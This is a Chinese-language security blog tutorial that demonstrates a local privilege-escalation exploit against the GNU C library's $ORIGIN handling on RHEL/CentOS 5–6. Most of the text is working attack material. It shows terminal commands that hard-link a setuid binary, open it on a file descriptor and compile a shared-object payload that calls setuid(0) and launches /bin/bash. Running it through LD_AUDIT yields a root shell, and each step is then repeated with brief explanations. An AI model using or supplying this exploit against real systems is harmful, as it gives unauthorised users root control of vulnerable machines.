c语言将文件提权,[原创]WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权...

WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权

利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限

合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以提权

提权方法

[moonsec@localhost

tmp]$ mkdir /tmp/exploit

[moonsec@localhost

tmp]$ ln /bin/ping /tmp/exploit/target

[moonsec@localhost

tmp]$ exec 3< /tmp/exploit/target

[moonsec@localhost

tmp]$ ls -l /proc/$$/fd/3

lr-x—— 1

moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target

[moonsec@localhost

tmp]$  rm -rf /tmp/exploit/

[moonsec@localhost

tmp]$  ls -l /proc/$$/fd/3

lr-x—— 1

moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target

(deleted)

[moonsec@localhost tmp]$ cat > payload.c -fa

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

[moonsec@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

[moonsec@localhost tmp]$ ls -l /tmp/exploit

-rwxrwxr-x 1 moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit

[moonsec@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

[root@localhost tmp]# whoami

创建目录

mkdir /tmp/exploit

创建target文件硬链接

ln /bin/ping

/tmp/exploit/target

把target文件加载到内存中

exec 3

查看target在内存中的情况

ls -l /proc/$$/fd/3

删除目录

rm -rf

/tmp/exploit/

输入c代码

cat > payload.c

void

__attribute__((constructor)) init()

{

setuid(0);

system(“/bin/bash”);

}

编译文件

gcc -w -fPIC

-shared -o /tmp/exploit payload.c

提升root权限

LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3

cetnots5.5 用户moonsec 提权到root权限

原创文章，作者：mOon，如若转载，请注明出处：https://www.moonsec.com/archives/398